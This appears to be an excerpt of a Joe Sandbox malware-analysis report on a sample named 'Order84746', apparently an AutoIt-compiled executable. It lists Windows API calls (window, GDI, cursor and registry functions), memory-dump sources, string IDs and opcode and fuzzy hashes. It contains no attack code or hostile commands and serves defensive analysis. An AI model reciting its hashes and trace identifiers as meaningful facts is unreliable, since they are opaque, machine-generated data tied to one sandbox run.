                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 3964851224-45149045
                          • Opcode ID: 3be2b8e4ad62e809370b1a44190c1006517fba4e7f3dd384e4f188092d881067
                          • Instruction ID: a81458f67b624be32f5176d0993270616945b44b9cab1efc0b2c5e891e26daf9
                          • Opcode Fuzzy Hash: 3be2b8e4ad62e809370b1a44190c1006517fba4e7f3dd384e4f188092d881067
                          • Instruction Fuzzy Hash: BEC141702043498BCB14EF18C551EAE77A6FF96344F044869F9859B3A2DB24ED4BCB53
                          APIs
                          • GetSysColor.USER32(00000012), ref: 0094D5AE
                          • SetTextColor.GDI32(?,?), ref: 0094D5B2
                          • GetSysColorBrush.USER32(0000000F), ref: 0094D5C8
                          • GetSysColor.USER32(0000000F), ref: 0094D5D3
                          • CreateSolidBrush.GDI32(?), ref: 0094D5D8
                          • GetSysColor.USER32(00000011), ref: 0094D5F0
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094D5FE
                          • SelectObject.GDI32(?,00000000), ref: 0094D60F
                          • SetBkColor.GDI32(?,00000000), ref: 0094D618
                          • SelectObject.GDI32(?,?), ref: 0094D625
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0094D644
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094D65B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0094D670
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0094D698
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0094D6BF
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0094D6DD
                          • DrawFocusRect.USER32(?,?), ref: 0094D6E8
                          • GetSysColor.USER32(00000011), ref: 0094D6F6
                          • SetTextColor.GDI32(?,00000000), ref: 0094D6FE
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0094D712
                          • SelectObject.GDI32(?,0094D2A5), ref: 0094D729
                          • DeleteObject.GDI32(?), ref: 0094D734
                          • SelectObject.GDI32(?,?), ref: 0094D73A
                          • DeleteObject.GDI32(?), ref: 0094D73F
                          • SetTextColor.GDI32(?,?), ref: 0094D745
                          • SetBkColor.GDI32(?,?), ref: 0094D74F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 509bd5b84ec97b1ba9dceb66fac6aa514e133fb0dba43111f894ff404983b0a2
                          • Instruction ID: 707d2f10ccb6aa589b43d52f4ef23aebb742c0896a513e9eb401d8a435af2f66
                          • Opcode Fuzzy Hash: 509bd5b84ec97b1ba9dceb66fac6aa514e133fb0dba43111f894ff404983b0a2
                          • Instruction Fuzzy Hash: 9D517E71E06208AFDF109FA8DC48EAE7B79FF09324F114115F925AB2A1D7B19A00DF90
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0094B7B0
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0094B7C1
                          • CharNextW.USER32(0000014E), ref: 0094B7F0
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0094B831
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0094B847
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0094B858
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0094B875
                          • SetWindowTextW.USER32(?,0000014E), ref: 0094B8C7
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0094B8DD
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0094B90E
                          • _memset.LIBCMT ref: 0094B933
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0094B97C
                          • _memset.LIBCMT ref: 0094B9DB
                          • SendMessageW.USER32 ref: 0094BA05
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0094BA5D
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0094BB0A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0094BB2C
                          • GetMenuItemInfoW.USER32(?), ref: 0094BB76
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0094BBA3
                          • DrawMenuBar.USER32(?), ref: 0094BBB2
                          • SetWindowTextW.USER32(?,0000014E), ref: 0094BBDA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: 4b905f3ba25db155238d5c703df1d4250f3663e06f4c7b701a9b537036c264a3
                          • Instruction ID: 49a42b690aa2208893c60c001337a7dcd417a092e80b56a76bd846081463d2b7
                          • Opcode Fuzzy Hash: 4b905f3ba25db155238d5c703df1d4250f3663e06f4c7b701a9b537036c264a3
                          • Instruction Fuzzy Hash: 88E17A75900218ABDB20DF65CC84EEE7BBCFF45714F14815AFA29AA290DB74CA41DF60
                          APIs
                          • GetCursorPos.USER32(?), ref: 0094778A
                          • GetDesktopWindow.USER32 ref: 0094779F
                          • GetWindowRect.USER32(00000000), ref: 009477A6
                          • GetWindowLongW.USER32(?,000000F0), ref: 00947808
                          • DestroyWindow.USER32(?), ref: 00947834
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0094785D
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094787B
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009478A1
                          • SendMessageW.USER32(?,00000421,?,?), ref: 009478B6
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009478C9
                          • IsWindowVisible.USER32(?), ref: 009478E9
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00947904
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00947918
                          • GetWindowRect.USER32(?,?), ref: 00947930
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00947956
                          • GetMonitorInfoW.USER32 ref: 00947970
                          • CopyRect.USER32(?,?), ref: 00947987
                          • SendMessageW.USER32(?,00000412,00000000), ref: 009479F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: aa559594f2e18f86518905548c34200e510fbcf44596b4680c8e12a815e3f0f7
                          • Instruction ID: 358a7da820ff45cc4932e88886bc056da5a61306f9f404fbf2cb1980ab440676
                          • Opcode Fuzzy Hash: aa559594f2e18f86518905548c34200e510fbcf44596b4680c8e12a815e3f0f7
                          • Instruction Fuzzy Hash: A6B16C71618345AFDB04DFA9C988B6AFBE5FF89310F00891DF5999B291D770E804CB92
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008FA939
                          • GetSystemMetrics.USER32(00000007), ref: 008FA941
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008FA96C
                          • GetSystemMetrics.USER32(00000008), ref: 008FA974
                          • GetSystemMetrics.USER32(00000004), ref: 008FA999
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008FA9B6
                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 008FA9C6
                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008FA9F9
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008FAA0D
                          • GetClientRect.USER32(00000000,000000FF), ref: 008FAA2B
                          • GetStockObject.GDI32(00000011), ref: 008FAA47
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 008FAA52
                            • Part of subcall function 008FB63C: GetCursorPos.USER32(000000FF), ref: 008FB64F
                            • Part of subcall function 008FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 008FB66C
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000001), ref: 008FB691
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000002), ref: 008FB69F
                          • SetTimer.USER32(00000000,00000000,00000028,008FAB87), ref: 008FAA79
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: ebf138308d9c0b8993fdd6fce982735eef8bbdec4aa6796afd4954913d11b887
                          • Instruction ID: 0751d1c35a093b1900ace600da8a6f090bfdafe8f27ce07ac4202339ffcf7574
                          • Opcode Fuzzy Hash: ebf138308d9c0b8993fdd6fce982735eef8bbdec4aa6796afd4954913d11b887
                          • Instruction Fuzzy Hash: 36B1BE71A1520AAFDB14DFA8CC45BAE7BB4FF08325F154229FA19E7290DB70E840DB51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Foreground
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 62970417-1919597938
                          • Opcode ID: b3cdc36576b68a685a7a9f3cd9b8e65ccfa814e3120528717ae88f7056dcf37c
                          • Instruction ID: 699ddd5613b9b2957a9588506f31b7f8c7e67f7280aa838915aa9bae10e190b7
                          • Opcode Fuzzy Hash: b3cdc36576b68a685a7a9f3cd9b8e65ccfa814e3120528717ae88f7056dcf37c
                          • Instruction Fuzzy Hash: DDD10C30508746ABCB14DF26C841AAABBF4FF56344F10492DF855971A1DB30E95ECBD2
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00943735
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097DC00,00000000,?,00000000,?,?), ref: 009437A3
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009437EB
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00943874
                          • RegCloseKey.ADVAPI32(?), ref: 00943B94
                          • RegCloseKey.ADVAPI32(00000000), ref: 00943BA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: fbb70261c3362699e58ce96323e10f3d857f3f2c813b29fae24ca7dfe66f9c1c
                          • Instruction ID: 0de9bc3650212189f9dbd579cb770bbf7ca01541a3edd2879f5e290e026a461a
                          • Opcode Fuzzy Hash: fbb70261c3362699e58ce96323e10f3d857f3f2c813b29fae24ca7dfe66f9c1c
                          • Instruction Fuzzy Hash: 54023B756046019FCB14EF29C855E2AB7E5FF89720F04855DF99A9B3A2CB70ED01CB82
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00946C56
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00946D16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: 01c7c9914b4645be5931b7ac551000b89e371489bd6009829d21d0afc8b5c4a3
                          • Instruction ID: c3f32886e0823f5808eb9be04ff63849c4f620051a7846c4be9a101d0f3ee493
                          • Opcode Fuzzy Hash: 01c7c9914b4645be5931b7ac551000b89e371489bd6009829d21d0afc8b5c4a3
                          • Instruction Fuzzy Hash: 15A16C742143459BCB14EF28C851E7AB3E5FF86314F104969B9A69B3D2DB30EC0ACB52
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 0091CF91
                          • __swprintf.LIBCMT ref: 0091D032
                          • _wcscmp.LIBCMT ref: 0091D045
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0091D09A
                          • _wcscmp.LIBCMT ref: 0091D0D6
                          • GetClassNameW.USER32(?,?,00000400), ref: 0091D10D
                          • GetDlgCtrlID.USER32(?), ref: 0091D15F
                          • GetWindowRect.USER32(?,?), ref: 0091D195
                          • GetParent.USER32(?), ref: 0091D1B3
                          • ScreenToClient.USER32(00000000), ref: 0091D1BA
                          • GetClassNameW.USER32(?,?,00000100), ref: 0091D234
                          • _wcscmp.LIBCMT ref: 0091D248
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0091D26E
                          • _wcscmp.LIBCMT ref: 0091D282
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                          • String ID: %s%u
                          • API String ID: 3119225716-679674701
                          • Opcode ID: 2a38cfb10f28d06422ae0ab304a4359051f75ff34b4d65637e5c472376c846b8
                          • Instruction ID: 866ed5d97e3447a14d524235592ee8f1e9a47433f55defb58794f3943d2b4d4e
                          • Opcode Fuzzy Hash: 2a38cfb10f28d06422ae0ab304a4359051f75ff34b4d65637e5c472376c846b8
                          • Instruction Fuzzy Hash: 5CA1AF7170920AAFD719DF64C884FEAB7ACFF44354F004919F9B992190DB30EA86CB91
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0091D8EB
                          • _wcscmp.LIBCMT ref: 0091D8FC
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0091D924
                          • CharUpperBuffW.USER32(?,00000000), ref: 0091D941
                          • _wcscmp.LIBCMT ref: 0091D95F
                          • _wcsstr.LIBCMT ref: 0091D970
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0091D9A8
                          • _wcscmp.LIBCMT ref: 0091D9B8
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0091D9DF
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0091DA28
                          • _wcscmp.LIBCMT ref: 0091DA38
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0091DA60
                          • GetWindowRect.USER32(00000004,?), ref: 0091DAC9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: 1cb23c7a69e5d0d08c2a04db58119c57ffe30bfaa9eec62b542f39bbc57491de
                          • Instruction ID: 1958e949295912e7963c576bd50af03a0c2a19224c1b423b5232830b690a3f5c
                          • Opcode Fuzzy Hash: 1cb23c7a69e5d0d08c2a04db58119c57ffe30bfaa9eec62b542f39bbc57491de
                          • Instruction Fuzzy Hash: E181A0312093499BDB05DF14C981BAA7BECFF84314F044469FD8A9A096DB70ED85CBA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: 7008aa05503e96800f6436616210ffea032918c2836039522d280d525f694b06
                          • Instruction ID: 4b92d65ff4db217ee6aaca00b43f1fc058fbd4fe132800273305c4870987a740
                          • Opcode Fuzzy Hash: 7008aa05503e96800f6436616210ffea032918c2836039522d280d525f694b06
                          • Instruction Fuzzy Hash: F6318F71A48249BADB14FB59DD43FEDB3B8AFA2758F200069F441B10D1FB51AB44C6A2
                          APIs
                          • LoadIconW.USER32(00000063), ref: 0091EAB0
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0091EAC2
                          • SetWindowTextW.USER32(?,?), ref: 0091EAD9
                          • GetDlgItem.USER32(?,000003EA), ref: 0091EAEE
                          • SetWindowTextW.USER32(00000000,?), ref: 0091EAF4
                          • GetDlgItem.USER32(?,000003E9), ref: 0091EB04
                          • SetWindowTextW.USER32(00000000,?), ref: 0091EB0A
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0091EB2B
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0091EB45
                          • GetWindowRect.USER32(?,?), ref: 0091EB4E
                          • SetWindowTextW.USER32(?,?), ref: 0091EBB9
                          • GetDesktopWindow.USER32 ref: 0091EBBF
                          • GetWindowRect.USER32(00000000), ref: 0091EBC6
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0091EC12
                          • GetClientRect.USER32(?,?), ref: 0091EC1F
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0091EC44
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0091EC6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: c7f49c9e8c6bf87105ddf18848e92615e1da61a65119b0502ccb55b37a45125e
                          • Instruction ID: d752b81e091eb52d691ba8547b8497039abd0560fdb7f2ce27d2b3423e4d891a
                          • Opcode Fuzzy Hash: c7f49c9e8c6bf87105ddf18848e92615e1da61a65119b0502ccb55b37a45125e
                          • Instruction Fuzzy Hash: 91514E71A04709AFDB20DFA9CD89FAEBBF9FF04704F00492CE596A25A0C774A944DB50
                          APIs
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 009379C6
                          • LoadCursorW.USER32(00000000,00007F00), ref: 009379D1
                          • LoadCursorW.USER32(00000000,00007F03), ref: 009379DC
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 009379E7
                          • LoadCursorW.USER32(00000000,00007F01), ref: 009379F2
                          • LoadCursorW.USER32(00000000,00007F81), ref: 009379FD
                          • LoadCursorW.USER32(00000000,00007F88), ref: 00937A08
                          • LoadCursorW.USER32(00000000,00007F80), ref: 00937A13
                          • LoadCursorW.USER32(00000000,00007F86), ref: 00937A1E
                          • LoadCursorW.USER32(00000000,00007F83), ref: 00937A29
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00937A34
                          • LoadCursorW.USER32(00000000,00007F82), ref: 00937A3F
